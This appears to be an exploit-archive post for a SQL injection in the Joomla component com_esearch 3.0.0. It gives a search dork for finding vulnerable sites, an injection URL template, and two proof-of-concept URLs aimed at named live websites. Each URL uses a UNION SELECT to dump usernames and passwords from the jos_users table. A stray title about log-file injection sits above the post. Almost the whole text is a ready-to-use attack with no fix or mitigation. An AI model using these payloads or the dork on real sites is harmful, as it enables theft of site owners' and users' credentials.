LFI to RCE via access_log injection

TNR Enhanced Joomla Search SQL Injection Vulnerability

[o] TNR Enhanced Joomla Search SQL Injection Vulnerability

Software : com_esearch ver 3.0.0
Vendor : http://www.tnrjoomla.com/
Dork : "com_esearch"
Author : NoGe


[o] Exploit

http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=[SQLi]


[o] PoC

http://www.visitdetroit.com/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
http://www.tnrjoomla.com/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--

Comments